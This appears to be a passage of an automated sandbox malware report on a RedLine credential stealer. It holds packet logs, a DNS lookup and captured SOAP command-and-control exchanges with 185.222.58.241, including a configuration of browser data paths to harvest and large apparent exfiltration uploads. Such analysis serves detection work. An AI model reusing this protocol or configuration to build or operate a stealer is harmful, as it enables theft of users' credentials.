Nov 24, 2024 20:12:24.734338045 CET	49715	55615	192.168.2.5	185.222.58.241
Nov 24, 2024 20:12:24.776236057 CET	55615	49715	185.222.58.241	192.168.2.5
Nov 24, 2024 20:12:24.776428938 CET	49715	55615	192.168.2.5	185.222.58.241
Nov 24, 2024 20:12:24.946358919 CET	55615	49715	185.222.58.241	192.168.2.5
Nov 24, 2024 20:12:24.946378946 CET	55615	49715	185.222.58.241	192.168.2.5
Nov 24, 2024 20:12:24.946388960 CET	55615	49715	185.222.58.241	192.168.2.5
Nov 24, 2024 20:12:24.946460009 CET	55615	49715	185.222.58.241	192.168.2.5
Nov 24, 2024 20:12:24.946513891 CET	49715	55615	192.168.2.5	185.222.58.241
Nov 24, 2024 20:12:24.946564913 CET	49715	55615	192.168.2.5	185.222.58.241
Nov 24, 2024 20:12:24.946573019 CET	55615	49715	185.222.58.241	192.168.2.5
Nov 24, 2024 20:12:24.946621895 CET	49715	55615	192.168.2.5	185.222.58.241
Nov 24, 2024 20:12:24.946676970 CET	55615	49715	185.222.58.241	192.168.2.5
Nov 24, 2024 20:12:24.946717978 CET	55615	49715	185.222.58.241	192.168.2.5
Nov 24, 2024 20:12:24.946726084 CET	49715	55615	192.168.2.5	185.222.58.241
Nov 24, 2024 20:12:24.946767092 CET	49715	55615	192.168.2.5	185.222.58.241
Nov 24, 2024 20:12:24.951651096 CET	55615	49715	185.222.58.241	192.168.2.5
Nov 24, 2024 20:12:24.951714039 CET	49715	55615	192.168.2.5	185.222.58.241
Nov 24, 2024 20:12:24.982676029 CET	55615	49715	185.222.58.241	192.168.2.5
Nov 24, 2024 20:12:24.982748985 CET	55615	49715	185.222.58.241	192.168.2.5
Nov 24, 2024 20:12:24.982769966 CET	49715	55615	192.168.2.5	185.222.58.241
Nov 24, 2024 20:12:24.982809067 CET	49715	55615	192.168.2.5	185.222.58.241
Nov 24, 2024 20:12:25.065712929 CET	55615	49715	185.222.58.241	192.168.2.5
Nov 24, 2024 20:12:25.065809011 CET	55615	49715	185.222.58.241	192.168.2.5
Nov 24, 2024 20:12:25.065861940 CET	49715	55615	192.168.2.5	185.222.58.241
Nov 24, 2024 20:12:25.065944910 CET	49715	55615	192.168.2.5	185.222.58.241
Nov 24, 2024 20:12:25.071158886 CET	55615	49715	185.222.58.241	192.168.2.5
Nov 24, 2024 20:12:25.071225882 CET	49715	55615	192.168.2.5	185.222.58.241
Nov 24, 2024 20:12:25.102195978 CET	55615	49715	185.222.58.241	192.168.2.5
Nov 24, 2024 20:12:25.102209091 CET	55615	49715	185.222.58.241	192.168.2.5
Nov 24, 2024 20:12:25.102263927 CET	49715	55615	192.168.2.5	185.222.58.241
Nov 24, 2024 20:12:25.102303982 CET	49715	55615	192.168.2.5	185.222.58.241
Nov 24, 2024 20:12:25.185338020 CET	55615	49715	185.222.58.241	192.168.2.5
Nov 24, 2024 20:12:25.185408115 CET	49715	55615	192.168.2.5	185.222.58.241
Nov 24, 2024 20:12:25.190612078 CET	55615	49715	185.222.58.241	192.168.2.5
Nov 24, 2024 20:12:25.190686941 CET	49715	55615	192.168.2.5	185.222.58.241
Nov 24, 2024 20:12:25.196748972 CET	55615	49715	185.222.58.241	192.168.2.5
Nov 24, 2024 20:12:25.196824074 CET	49715	55615	192.168.2.5	185.222.58.241
Nov 24, 2024 20:12:25.221647024 CET	55615	49715	185.222.58.241	192.168.2.5
Nov 24, 2024 20:12:25.221654892 CET	55615	49715	185.222.58.241	192.168.2.5
Nov 24, 2024 20:12:25.221709967 CET	49715	55615	192.168.2.5	185.222.58.241
Nov 24, 2024 20:12:25.221761942 CET	49715	55615	192.168.2.5	185.222.58.241
Nov 24, 2024 20:12:25.308820963 CET	55615	49715	185.222.58.241	192.168.2.5
Nov 24, 2024 20:12:25.308964968 CET	49715	55615	192.168.2.5	185.222.58.241
Nov 24, 2024 20:12:25.318119049 CET	55615	49715	185.222.58.241	192.168.2.5
Nov 24, 2024 20:12:25.318185091 CET	49715	55615	192.168.2.5	185.222.58.241
Nov 24, 2024 20:12:25.323441029 CET	55615	49715	185.222.58.241	192.168.2.5
Nov 24, 2024 20:12:25.323496103 CET	49715	55615	192.168.2.5	185.222.58.241
Nov 24, 2024 20:12:25.346275091 CET	55615	49715	185.222.58.241	192.168.2.5
Nov 24, 2024 20:12:25.346344948 CET	55615	49715	185.222.58.241	192.168.2.5
Nov 24, 2024 20:12:25.346362114 CET	49715	55615	192.168.2.5	185.222.58.241
Nov 24, 2024 20:12:25.346402884 CET	49715	55615	192.168.2.5	185.222.58.241
Nov 24, 2024 20:12:25.389585018 CET	55615	49715	185.222.58.241	192.168.2.5
Nov 24, 2024 20:12:25.389785051 CET	49715	55615	192.168.2.5	185.222.58.241
Nov 24, 2024 20:12:25.434880972 CET	55615	49715	185.222.58.241	192.168.2.5
Nov 24, 2024 20:12:25.434963942 CET	49715	55615	192.168.2.5	185.222.58.241
Nov 24, 2024 20:12:25.444358110 CET	55615	49715	185.222.58.241	192.168.2.5
Nov 24, 2024 20:12:25.444447041 CET	49715	55615	192.168.2.5	185.222.58.241
Nov 24, 2024 20:12:25.445547104 CET	55615	49715	185.222.58.241	192.168.2.5
Nov 24, 2024 20:12:25.445616961 CET	49715	55615	192.168.2.5	185.222.58.241
Nov 24, 2024 20:12:25.472664118 CET	55615	49715	185.222.58.241	192.168.2.5
Nov 24, 2024 20:12:25.472673893 CET	55615	49715	185.222.58.241	192.168.2.5
Nov 24, 2024 20:12:25.472779036 CET	49715	55615	192.168.2.5	185.222.58.241
Nov 24, 2024 20:12:25.517585039 CET	55615	49715	185.222.58.241	192.168.2.5
Nov 24, 2024 20:12:25.517654896 CET	49715	55615	192.168.2.5	185.222.58.241
Nov 24, 2024 20:12:25.559853077 CET	55615	49715	185.222.58.241	192.168.2.5
Nov 24, 2024 20:12:25.559948921 CET	49715	55615	192.168.2.5	185.222.58.241
Nov 24, 2024 20:12:25.568777084 CET	55615	49715	185.222.58.241	192.168.2.5
Nov 24, 2024 20:12:25.568842888 CET	49715	55615	192.168.2.5	185.222.58.241
Nov 24, 2024 20:12:25.570027113 CET	55615	49715	185.222.58.241	192.168.2.5
Nov 24, 2024 20:12:25.570091009 CET	49715	55615	192.168.2.5	185.222.58.241
Nov 24, 2024 20:12:25.596445084 CET	55615	49715	185.222.58.241	192.168.2.5
Nov 24, 2024 20:12:25.596509933 CET	49715	55615	192.168.2.5	185.222.58.241
Nov 24, 2024 20:12:25.596517086 CET	55615	49715	185.222.58.241	192.168.2.5
Nov 24, 2024 20:12:25.596556902 CET	55615	49715	185.222.58.241	192.168.2.5
Nov 24, 2024 20:12:25.596570969 CET	49715	55615	192.168.2.5	185.222.58.241
Nov 24, 2024 20:12:25.596605062 CET	49715	55615	192.168.2.5	185.222.58.241
Nov 24, 2024 20:12:25.682379007 CET	55615	49715	185.222.58.241	192.168.2.5
Nov 24, 2024 20:12:25.682518959 CET	49715	55615	192.168.2.5	185.222.58.241
Nov 24, 2024 20:12:25.691860914 CET	55615	49715	185.222.58.241	192.168.2.5
Nov 24, 2024 20:12:25.692049980 CET	49715	55615	192.168.2.5	185.222.58.241
Nov 24, 2024 20:12:25.693218946 CET	55615	49715	185.222.58.241	192.168.2.5
Nov 24, 2024 20:12:25.693285942 CET	49715	55615	192.168.2.5	185.222.58.241
Nov 24, 2024 20:12:25.721610069 CET	55615	49715	185.222.58.241	192.168.2.5
Nov 24, 2024 20:12:25.721635103 CET	55615	49715	185.222.58.241	192.168.2.5
Nov 24, 2024 20:12:25.721693039 CET	49715	55615	192.168.2.5	185.222.58.241
Nov 24, 2024 20:12:25.721725941 CET	49715	55615	192.168.2.5	185.222.58.241
Nov 24, 2024 20:12:25.765563965 CET	55615	49715	185.222.58.241	192.168.2.5
Nov 24, 2024 20:12:25.765650034 CET	49715	55615	192.168.2.5	185.222.58.241
Nov 24, 2024 20:12:25.807900906 CET	55615	49715	185.222.58.241	192.168.2.5
Nov 24, 2024 20:12:25.807962894 CET	49715	55615	192.168.2.5	185.222.58.241
Nov 24, 2024 20:12:25.817101955 CET	55615	49715	185.222.58.241	192.168.2.5
Nov 24, 2024 20:12:25.817163944 CET	49715	55615	192.168.2.5	185.222.58.241
Nov 24, 2024 20:12:25.818670034 CET	55615	49715	185.222.58.241	192.168.2.5
Nov 24, 2024 20:12:25.818723917 CET	49715	55615	192.168.2.5	185.222.58.241
Nov 24, 2024 20:12:25.846137047 CET	55615	49715	185.222.58.241	192.168.2.5
Nov 24, 2024 20:12:25.846223116 CET	55615	49715	185.222.58.241	192.168.2.5
Nov 24, 2024 20:12:25.846355915 CET	55615	49715	185.222.58.241	192.168.2.5
Nov 24, 2024 20:12:25.930388927 CET	55615	49715	185.222.58.241	192.168.2.5
Nov 24, 2024 20:12:25.938709021 CET	55615	49715	185.222.58.241	192.168.2.5
Nov 24, 2024 20:12:25.939811945 CET	55615	49715	185.222.58.241	192.168.2.5
Nov 24, 2024 20:12:25.965692043 CET	55615	49715	185.222.58.241	192.168.2.5
Nov 24, 2024 20:12:25.965742111 CET	55615	49715	185.222.58.241	192.168.2.5
Nov 24, 2024 20:12:25.965802908 CET	55615	49715	185.222.58.241	192.168.2.5
Nov 24, 2024 20:12:26.049895048 CET	55615	49715	185.222.58.241	192.168.2.5
Nov 24, 2024 20:12:26.058437109 CET	55615	49715	185.222.58.241	192.168.2.5
Nov 24, 2024 20:12:26.058573961 CET	55615	49715	185.222.58.241	192.168.2.5
Nov 24, 2024 20:12:26.085105896 CET	55615	49715	185.222.58.241	192.168.2.5
Nov 24, 2024 20:12:26.085216999 CET	55615	49715	185.222.58.241	192.168.2.5
Nov 24, 2024 20:12:26.125570059 CET	55615	49715	185.222.58.241	192.168.2.5
Nov 24, 2024 20:12:26.175462008 CET	55615	49715	185.222.58.241	192.168.2.5
Nov 24, 2024 20:12:26.183680058 CET	55615	49715	185.222.58.241	192.168.2.5
Nov 24, 2024 20:12:26.184433937 CET	55615	49715	185.222.58.241	192.168.2.5
Nov 24, 2024 20:12:26.204042912 CET	55615	49715	185.222.58.241	192.168.2.5
Nov 24, 2024 20:12:26.253617048 CET	55615	49715	185.222.58.241	192.168.2.5
Nov 24, 2024 20:12:26.373914003 CET	55615	49715	185.222.58.241	192.168.2.5
Nov 24, 2024 20:12:26.373928070 CET	55615	49715	185.222.58.241	192.168.2.5
Nov 24, 2024 20:12:26.373936892 CET	55615	49715	185.222.58.241	192.168.2.5
Nov 24, 2024 20:12:26.374000072 CET	55615	49715	185.222.58.241	192.168.2.5
Nov 24, 2024 20:12:26.374042988 CET	55615	49715	185.222.58.241	192.168.2.5
Nov 24, 2024 20:12:26.374063969 CET	55615	49715	185.222.58.241	192.168.2.5
Nov 24, 2024 20:12:26.374150991 CET	55615	49715	185.222.58.241	192.168.2.5
Nov 24, 2024 20:12:26.374206066 CET	55615	49715	185.222.58.241	192.168.2.5
Nov 24, 2024 20:12:26.424324036 CET	55615	49715	185.222.58.241	192.168.2.5
Nov 24, 2024 20:12:26.432145119 CET	55615	49715	185.222.58.241	192.168.2.5
Nov 24, 2024 20:12:26.458065033 CET	55615	49715	185.222.58.241	192.168.2.5
Nov 24, 2024 20:12:26.458132029 CET	55615	49715	185.222.58.241	192.168.2.5
Nov 24, 2024 20:12:26.493096113 CET	55615	49715	185.222.58.241	192.168.2.5
Nov 24, 2024 20:12:26.544117928 CET	55615	49715	185.222.58.241	192.168.2.5
Nov 24, 2024 20:12:26.551820040 CET	55615	49715	185.222.58.241	192.168.2.5
Nov 24, 2024 20:12:26.577567101 CET	55615	49715	185.222.58.241	192.168.2.5
Nov 24, 2024 20:12:26.577629089 CET	55615	49715	185.222.58.241	192.168.2.5
Nov 24, 2024 20:12:26.577660084 CET	55615	49715	185.222.58.241	192.168.2.5
Nov 24, 2024 20:12:26.591351032 CET	55615	49715	185.222.58.241	192.168.2.5
Nov 24, 2024 20:12:26.653567076 CET	55615	49715	185.222.58.241	192.168.2.5
Nov 24, 2024 20:12:26.663542986 CET	55615	49715	185.222.58.241	192.168.2.5
Nov 24, 2024 20:12:26.697298050 CET	55615	49715	185.222.58.241	192.168.2.5
Nov 24, 2024 20:12:26.697320938 CET	55615	49715	185.222.58.241	192.168.2.5
Nov 24, 2024 20:12:26.697465897 CET	55615	49715	185.222.58.241	192.168.2.5
Nov 24, 2024 20:12:26.697566032 CET	55615	49715	185.222.58.241	192.168.2.5
Nov 24, 2024 20:12:26.753550053 CET	55615	49715	185.222.58.241	192.168.2.5
Nov 24, 2024 20:12:26.786657095 CET	55615	49715	185.222.58.241	192.168.2.5
Nov 24, 2024 20:12:26.821919918 CET	55615	49715	185.222.58.241	192.168.2.5
Nov 24, 2024 20:12:26.821979046 CET	55615	49715	185.222.58.241	192.168.2.5
Nov 24, 2024 20:12:26.822108984 CET	55615	49715	185.222.58.241	192.168.2.5
Nov 24, 2024 20:12:26.822220087 CET	55615	49715	185.222.58.241	192.168.2.5
Nov 24, 2024 20:12:26.822277069 CET	55615	49715	185.222.58.241	192.168.2.5
Nov 24, 2024 20:12:26.910281897 CET	55615	49715	185.222.58.241	192.168.2.5
Nov 24, 2024 20:12:26.946748018 CET	55615	49715	185.222.58.241	192.168.2.5
Nov 24, 2024 20:12:26.946779013 CET	55615	49715	185.222.58.241	192.168.2.5
Nov 24, 2024 20:12:26.946896076 CET	55615	49715	185.222.58.241	192.168.2.5
Nov 24, 2024 20:12:26.946934938 CET	55615	49715	185.222.58.241	192.168.2.5
Nov 24, 2024 20:12:26.947030067 CET	55615	49715	185.222.58.241	192.168.2.5
Nov 24, 2024 20:12:27.036499023 CET	55615	49715	185.222.58.241	192.168.2.5
Nov 24, 2024 20:12:27.036528111 CET	55615	49715	185.222.58.241	192.168.2.5
Nov 24, 2024 20:12:27.072789907 CET	55615	49715	185.222.58.241	192.168.2.5
Nov 24, 2024 20:12:27.072870970 CET	55615	49715	185.222.58.241	192.168.2.5
Nov 24, 2024 20:12:27.072971106 CET	55615	49715	185.222.58.241	192.168.2.5
Nov 24, 2024 20:12:27.073051929 CET	55615	49715	185.222.58.241	192.168.2.5
Nov 24, 2024 20:12:27.117542982 CET	55615	49715	185.222.58.241	192.168.2.5
Nov 24, 2024 20:12:27.161756039 CET	55615	49715	185.222.58.241	192.168.2.5
Nov 24, 2024 20:12:27.161799908 CET	55615	49715	185.222.58.241	192.168.2.5
Nov 24, 2024 20:12:27.197076082 CET	55615	49715	185.222.58.241	192.168.2.5
Nov 24, 2024 20:12:27.197091103 CET	55615	49715	185.222.58.241	192.168.2.5
Nov 24, 2024 20:12:27.197221994 CET	55615	49715	185.222.58.241	192.168.2.5
Nov 24, 2024 20:12:27.197406054 CET	55615	49715	185.222.58.241	192.168.2.5
Nov 24, 2024 20:12:27.197422028 CET	55615	49715	185.222.58.241	192.168.2.5
Nov 24, 2024 20:12:27.503530025 CET	55615	49715	185.222.58.241	192.168.2.5
Nov 24, 2024 20:12:27.518634081 CET	49711	55615	192.168.2.5	185.222.58.241
Nov 24, 2024 20:12:27.519237995 CET	49715	55615	192.168.2.5	185.222.58.241

UDP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Nov 24, 2024 20:12:09.492325068 CET	55865	53	192.168.2.5	1.1.1.1

DNS Queries

Timestamp	Source IP	Dest IP	Trans ID	OP Code	Name	Type	Class	DNS over HTTPS
Nov 24, 2024 20:12:09.492325068 CET	192.168.2.5	1.1.1.1	0x65c4	Standard query (0)	api.ip.sb	A (IP address)	IN (0x0001)	false

DNS Answers

Timestamp	Source IP	Dest IP	Trans ID	Reply Code	Name	CName	Address	Type	Class	DNS over HTTPS
Nov 24, 2024 20:12:09.636909008 CET	1.1.1.1	192.168.2.5	0x65c4	No error (0)	api.ip.sb	api.ip.sb.cdn.cloudflare.net		CNAME (Canonical name)	IN (0x0001)	false

HTTP Request Dependency Graph

185.222.58.241:55615

HTTP Packets

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
0	192.168.2.5	49707	185.222.58.241	55615	5260	C:\Users\user\Desktop\8ZVd2S51fr.exe

Timestamp	Bytes transferred	Direction	Data
Nov 24, 2024 20:12:02.060913086 CET	241	OUT	POST / HTTP/1.1 Content-Type: text/xml; charset=utf-8 SOAPAction: "http://tempuri.org/Endpoint/CheckConnect" Host: 185.222.58.241:55615 Content-Length: 137 Expect: 100-continue Accept-Encoding: gzip, deflate Connection: Keep-Alive
Nov 24, 2024 20:12:03.333905935 CET	25	IN	HTTP/1.1 100 Continue
Nov 24, 2024 20:12:03.578752995 CET	359	IN	HTTP/1.1 200 OK Content-Length: 212 Content-Type: text/xml; charset=utf-8 Server: Microsoft-HTTPAPI/2.0 Date: Sun, 24 Nov 2024 19:12:02 GMT Data Raw: 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 43 68 65 63 6b 43 6f 6e 6e 65 63 74 52 65 73 70 6f 6e 73 65 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 74 65 6d 70 75 72 69 2e 6f 72 67 2f 22 3e 3c 43 68 65 63 6b 43 6f 6e 6e 65 63 74 52 65 73 75 6c 74 3e 74 72 75 65 3c 2f 43 68 65 63 6b 43 6f 6e 6e 65 63 74 52 65 73 75 6c 74 3e 3c 2f 43 68 65 63 6b 43 6f 6e 6e 65 63 74 52 65 73 70 6f 6e 73 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e Data Ascii: <s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/"><s:Body><CheckConnectResponse xmlns="http://tempuri.org/"><CheckConnectResult>true</CheckConnectResult></CheckConnectResponse></s:Body></s:Envelope>
Nov 24, 2024 20:12:08.644304037 CET	224	OUT	POST / HTTP/1.1 Content-Type: text/xml; charset=utf-8 SOAPAction: "http://tempuri.org/Endpoint/EnvironmentSettings" Host: 185.222.58.241:55615 Content-Length: 144 Expect: 100-continue Accept-Encoding: gzip, deflate
Nov 24, 2024 20:12:09.048285961 CET	25	IN	HTTP/1.1 100 Continue
Nov 24, 2024 20:12:09.417953014 CET	1236	IN	HTTP/1.1 200 OK Content-Length: 4744 Content-Type: text/xml; charset=utf-8 Server: Microsoft-HTTPAPI/2.0 Date: Sun, 24 Nov 2024 19:12:08 GMT Data Raw: 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 45 6e 76 69 72 6f 6e 6d 65 6e 74 53 65 74 74 69 6e 67 73 52 65 73 70 6f 6e 73 65 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 74 65 6d 70 75 72 69 2e 6f 72 67 2f 22 3e 3c 45 6e 76 69 72 6f 6e 6d 65 6e 74 53 65 74 74 69 6e 67 73 52 65 73 75 6c 74 20 78 6d 6c 6e 73 3a 61 3d 22 42 72 6f 77 73 65 72 45 78 74 65 6e 73 69 6f 6e 22 20 78 6d 6c 6e 73 3a 69 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 31 2f 58 4d 4c 53 63 68 65 6d 61 2d 69 6e 73 74 61 6e 63 65 22 3e 3c 61 3a 42 6c 6f 63 6b 65 64 43 6f 75 6e 74 72 79 20 78 6d 6c 6e 73 3a 62 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 6d 69 63 72 6f 73 6f 66 74 2e 63 6f 6d 2f 32 30 30 33 2f 31 30 2f 53 65 72 69 61 6c 69 7a 61 74 69 6f 6e 2f 41 72 72 61 79 73 22 2f 3e 3c 61 3a 42 6c 6f 63 6b 65 64 49 50 20 78 6d 6c [TRUNCATED] Data Ascii: <s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/"><s:Body><EnvironmentSettingsResponse xmlns="http://tempuri.org/"><EnvironmentSettingsResult xmlns:a="BrowserExtension" xmlns:i="http://www.w3.org/2001/XMLSchema-instance"><a:BlockedCountry xmlns:b="http://schemas.microsoft.com/2003/10/Serialization/Arrays"/><a:BlockedIP xmlns:b="http://schemas.microsoft.com/2003/10/Serialization/Arrays"/><a:Object4>true</a:Object4><a:Object6>false</a:Object6><a:ScanBrowsers>true</a:ScanBrowsers><a:ScanChromeBrowsersPaths xmlns:b="http://schemas.microsoft.com/2003/10/Serialization/Arrays"><b:string>%USERPROFILE%\AppData\Local\Battle.net</b:string><b:string>%USERPROFILE%\AppData\Local\Chromium\User Data</b:string><b:string>%USERPROFILE%\AppData\Local\Google\Chrome\User Data</b:string><b:string>%USERPROFILE%\AppData\Local\Google(x86)\Chrome\User Data</b:string><b:string>%USERPROFILE%\AppData\Roaming\Opera Software\</b:string><b:string>%USERPROFILE%\AppData\Local\MapleStudio\ChromePlus\User Data</b:string [TRUNCATED]

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
1	192.168.2.5	49711	185.222.58.241	55615	5260	C:\Users\user\Desktop\8ZVd2S51fr.exe

Timestamp	Bytes transferred	Direction	Data
Nov 24, 2024 20:12:13.366044044 CET	222	OUT	POST / HTTP/1.1 Content-Type: text/xml; charset=utf-8 SOAPAction: "http://tempuri.org/Endpoint/SetEnvironment" Host: 185.222.58.241:55615 Content-Length: 957847 Expect: 100-continue Accept-Encoding: gzip, deflate
Nov 24, 2024 20:12:19.858050108 CET	294	IN	HTTP/1.1 200 OK Content-Length: 147 Content-Type: text/xml; charset=utf-8 Server: Microsoft-HTTPAPI/2.0 Date: Sun, 24 Nov 2024 19:12:18 GMT Data Raw: 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 53 65 74 45 6e 76 69 72 6f 6e 6d 65 6e 74 52 65 73 70 6f 6e 73 65 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 74 65 6d 70 75 72 69 2e 6f 72 67 2f 22 2f 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e Data Ascii: <s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/"><s:Body><SetEnvironmentResponse xmlns="http://tempuri.org/"/></s:Body></s:Envelope>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
2	192.168.2.5	49715	185.222.58.241	55615	5260	C:\Users\user\Desktop\8ZVd2S51fr.exe

Timestamp	Bytes transferred	Direction	Data
Nov 24, 2024 20:12:19.980694056 CET	242	OUT	POST / HTTP/1.1 Content-Type: text/xml; charset=utf-8 SOAPAction: "http://tempuri.org/Endpoint/GetUpdates" Host: 185.222.58.241:55615 Content-Length: 957839 Expect: 100-continue Accept-Encoding: gzip, deflate Connection: Keep-Alive
Nov 24, 2024 20:12:27.503530025 CET	408	IN	HTTP/1.1 200 OK Content-Length: 261 Content-Type: text/xml; charset=utf-8 Server: Microsoft-HTTPAPI/2.0 Date: Sun, 24 Nov 2024 19:12:26 GMT Data Raw: 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 47 65 74 55 70 64 61 74 65 73 52 65 73 70 6f 6e 73 65 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 74 65 6d 70 75 72 69 2e 6f 72 67 2f 22 3e 3c 47 65 74 55 70 64 61 74 65 73 52 65 73 75 6c 74 20 78 6d 6c 6e 73 3a 61 3d 22 42 72 6f 77 73 65 72 45 78 74 65 6e 73 69 6f 6e 22 20 78 6d 6c 6e 73 3a 69 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 31 2f 58 4d 4c 53 63 68 65 6d 61 2d 69 6e 73 74 61 6e 63 65 22 2f 3e 3c 2f 47 65 74 55 70 64 61 74 65 73 52 65 73 70 6f 6e 73 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e Data Ascii: <s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/"><s:Body><GetUpdatesResponse xmlns="http://tempuri.org/"><GetUpdatesResult xmlns:a="BrowserExtension" xmlns:i="http://www.w3.org/2001/XMLSchema-instance"/></GetUpdatesResponse></s:Body></s:Envelope>

Target ID:	0
Start time:	14:11:57
Start date:	24/11/2024
Path:	C:\Users\user\Desktop\8ZVd2S51fr.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\Desktop\8ZVd2S51fr.exe"
Imagebase:	0x1d0000
File size:	826'368 bytes
MD5 hash:	4376650C9845C351BA30D405B17D3502
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000000.00000002.2090231479.000000000384A000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_RedLine, Description: Yara detected RedLine Stealer, Source: 00000000.00000002.2090231479.000000000384A000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: Windows_Trojan_RedLineStealer_f54632eb, Description: unknown, Source: 00000000.00000002.2090231479.000000000384A000.00000004.00000800.00020000.00000000.sdmp, Author: unknown Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000000.00000002.2090231479.000000000374F000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_RedLine, Description: Yara detected RedLine Stealer, Source: 00000000.00000002.2090231479.000000000374F000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: Windows_Trojan_RedLineStealer_f54632eb, Description: unknown, Source: 00000000.00000002.2090231479.000000000374F000.00000004.00000800.00020000.00000000.sdmp, Author: unknown
Reputation:	low
Has exited:	true

Show Windows behavior

Target ID:	3
Start time:	14:12:00
Start date:	24/11/2024
Path:	C:\Users\user\Desktop\8ZVd2S51fr.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\Desktop\8ZVd2S51fr.exe"
Imagebase:	0xbe0000
File size:	826'368 bytes
MD5 hash:	4376650C9845C351BA30D405B17D3502
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000003.00000002.2329442036.0000000000402000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_RedLine, Description: Yara detected RedLine Stealer, Source: 00000003.00000002.2329442036.0000000000402000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security Rule: Windows_Trojan_RedLineStealer_f54632eb, Description: unknown, Source: 00000003.00000002.2329442036.0000000000402000.00000040.00000400.00020000.00000000.sdmp, Author: unknown Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000003.00000002.2330608150.0000000002F91000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
Reputation:	low
Has exited:	true

Show Windows behavior

Target ID:	4
Start time:	14:12:00
Start date:	24/11/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff6d64d0000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Execution Graph

Execution Coverage:	10.7%
Dynamic/Decrypted Code Coverage:	100%
Signature Coverage:	0%
Total number of Nodes:	151
Total number of Limit Nodes:	8

Executed Functions

Function 06D1AEF8 Relevance: .4, Instructions: 412COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2091375470.0000000006D10000.00000040.00000800.00020000.00000000.sdmp, Offset: 06D10000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6d10000_8ZVd2S51fr.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: bec5fb9aa4121b0d43c9b2a3eee01689061e1b383d3c775329a127c497eb888a
Instruction ID: 516b17f469e51e55121be457ec6213c72f97e01430c7a9fba3d87b2f4319254d
Opcode Fuzzy Hash: bec5fb9aa4121b0d43c9b2a3eee01689061e1b383d3c775329a127c497eb888a
Instruction Fuzzy Hash: E6E1DE70B016009FDBA5DB75D550BAEBBF6AF8A300F14846EE146DB392CB74D805CB61

Function 06D11E00 Relevance: .1, Instructions: 59COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2091375470.0000000006D10000.00000040.00000800.00020000.00000000.sdmp, Offset: 06D10000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6d10000_8ZVd2S51fr.jbxd

Similarity

API ID:
String ID:
API String ID:
